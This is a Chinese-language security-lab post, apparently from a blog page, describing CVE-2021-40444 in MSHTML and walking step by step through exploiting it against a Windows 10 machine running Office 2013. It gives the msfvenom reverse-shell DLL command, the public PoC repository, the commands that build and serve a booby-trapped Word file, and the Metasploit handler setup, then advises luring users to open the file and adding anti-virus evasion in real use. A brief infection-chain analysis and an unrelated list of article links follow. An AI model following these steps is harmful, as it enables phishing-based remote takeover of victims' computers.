0x01 漏洞描述

2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。

Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。

0x02 漏洞影响

漏洞编号:CVE-2021-40444

影响版本:Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本,覆盖面比较广泛,主要用于Office钓鱼。

0x03 测试环境

**攻击机:**kali-linux 2022.1

**靶机:**windows 10(office 2013)

本次漏洞使用lockedbyte师傅的POC,结合kali-linux中metersploit工具

下载地址:

(https://github.com/lockedbyte/CVE-2021-40444)

0x04 漏洞应用场景

4.1 Kali安装依赖包

sudo apt-get install lcab -y

4.2 生成含有后门的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll

下载Poc,进入CVE-2021-40444文件目录下修改exploit.py权限添加写权限,将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。

sudo git clone https://github.com/lockedbyte/CVE-2021-40444

4.3 利用POC脚本生成含有恶意代码的word文件

sudo python3 exploit.py generate http.dll 本地服务器URL

含有恶意代码的Word文件生成后输出位置在out目录下。

4.4 将含有恶意代码的word文件发送给目标

进入out目录下,启动Python服务器。

python3 -m http.server 80

诱导目标用户点击含有恶意代码的word文件。

4.5 创建监听

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit

4.6 漏洞触发

文件启动时与服务器获取连接。

目标主机成功上线MSF。

0x05 病毒样本分析

5.1 本地杀软病毒样本检测

5.2 在线病毒样本检测

恶意文件执行流程,文件中创建了MSOSYNC.EXE进程,该进程主要收集操作系统硬件相关的指纹信息

(MachineGuid,DigitalProductId,SystemBiosDate)获取系统信息,包含查询计算机时区的功能。

5.3 样本分析详情

解压样本文件

样本文件中的document.xml.rels中存储了指向的恶意html网站链接,浏览器会自动打开网站链接。

该URL下载一个名为word.html,HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开,INF文件存储在%TEMP%\Low目录中

由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中,使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件。

攻击者通过伪造cab文件内嵌含有载荷的dll文件,借助漏洞使html文件JavaScript加载含有恶意代码的dll,从而远程执行payload。

文中漏洞利用并未进行免杀处理,如在生产环境下利用时,可结合Office宏病毒等免杀系列技巧进行免杀、混淆,从而获取目标控制权限。

参考链接

  1. https://baijiahao.baidu.com/s?id=1715778340261801914

  2. https://github.com/lockedbyte/CVE-2021-40444

  3. http://www.chinainfosec.org.cn/index.php?m=content&c=index&a=show&catid=57&id=488

  4. https://blog.csdn.net/qq_43332010/article/details/120463783

  5. https://www.ddosi.org/cve-2021-40444-exp/

声明

以上内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

利用CVE-2021-40444漏洞钓鱼执法上线MSF相关推荐

  1. 使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)

    使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502) 警告 请勿将本文提到的任何技术用于非法用途 ...

  2. 2021 HW 漏洞清单汇总 ( 附 poc )

    2021 HW 漏洞清单汇总 2021.4.8--4.22 披露时间         涉及商家/产品        漏洞描述 2021/04/08        启明星辰天清汉马USG防火墙存在逻辑缺 ...

  3. Zoho:尽快修复已遭利用的 ManageEngine 严重漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 商业软件提供商 Zoho 督促客户尽快将 Desktop Central 和 Desktop Central MSP 更新至最新版本. Zoho ...

  4. 安卓修复已遭在野利用的内核 0day 漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 谷歌安卓在2021年11月安全更新共修复了39个漏洞,其中18个位于框架和系统组件中,18个位于内核和供应商组件中. 安卓安全更新修复了一个0d ...

  5. 上线MSF(Metasploit)的几种常见方式

    powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/we ...

  6. 利用永恒之蓝漏洞+修复方法(MS17-010)

    文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...

  7. 利用DNS Zone Transfers漏洞工具dnswalk

    利用DNS Zone Transfers漏洞工具dnswalk DNS Zone Transfers(DNS区域传输)是指一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库.当主服务器 ...

  8. 蜜罐中利用jsonp跨域漏洞和xss漏洞的分析

    一.前言 我们在打红队的时候,经常会碰到蜜罐,而更有一些"主动防御"的蜜罐中利用到了一些网站的跨域漏洞和xss,对此进行简单分析. 二.蜜罐的概念 蜜罐主要是通过布置诱饵,诱使攻击 ...

  9. 利用该0 day漏洞的攻击活动情况

    谷歌研究人员发现macOS漏洞利用. 谷歌研究人员在macOS系统中发现了一个安全漏洞--CVE-2021-30869.攻击者利用该漏洞可以以kernel权限执行任意代码.8月底,谷歌研究人员发现了该 ...

最新文章

  1. 仅用 4 小时,吃透“百度太行”背后硬科技!
  2. 汇聚开发者星星之火,华为鸿蒙系统有希望成为国产之光?
  3. 《ASP.NET 开发从入门到精通》----2.3 编译和部署ASP.NET程序
  4. cramer定理_Lundberg-Cramer定理
  5. 【计算理论】不可判定性 ( 停机问题 | 图灵机语言是否空集问题 | 图灵机是否等价问题 | 是否存在自动机接受图灵机语言问题 | 莱斯定理 Rice‘s Theorem )
  6. vFORUM十大“最”看点,带你“撩”会议
  7. 力扣 136. 只出现一次的数字 【异或运算】
  8. linux 内网怎么安装git环境_linux 安装go环境
  9. 监督学习 | 集成学习 之Bagging、随机森林及Sklearn实现
  10. 最强大的人工智能系统 | NVIDIA DGX-2
  11. element 点击控制expend的显示隐藏_四、ArcGIS Runtime SDK for iOS 100.X教程系列之图层控制显示隐藏...
  12. 【git】LibreSSL SSL_connect: SSL_ERROR_SYSCALL in connection to github.com:443
  13. 更新卡片的zIndex
  14. 从DLL导出.a文件
  15. flume学习(五):使用hive来分析flume收集的日志数据
  16. [转载]刘继东:个人知识管理-走出去,请进来
  17. Intl.NumberFormat 设置数字格式
  18. Python优化算法01——差分进化算法
  19. 概念数据模型到逻辑数据模型的转化
  20. Scala的安装与配置

热门文章

  1. Goproxy(Go模块代理)的使用与配置
  2. 深度学习国外经典教程——大师带你入门(视频、PPT讲稿)
  3. WAS集群:记一次Node Agent不活动问题解决过程
  4. Linux下c++串口编程
  5. 【验证小bai】只有SV+modelsim学验证(5)——先将嗷嗷待验的DUT加入环境,至此就只遗留环境的灵魂RM了
  6. 2021校赛ctf write up
  7. Oracle Unifier 工程项目管理业务架构(含脑图)持续更新中...
  8. Centos 7下通过KVM安装win10
  9. iOS获取ipa及解压Assets.car,兼容M1
  10. 红帽峰会2018第一天:数字转型扛把子OpenShift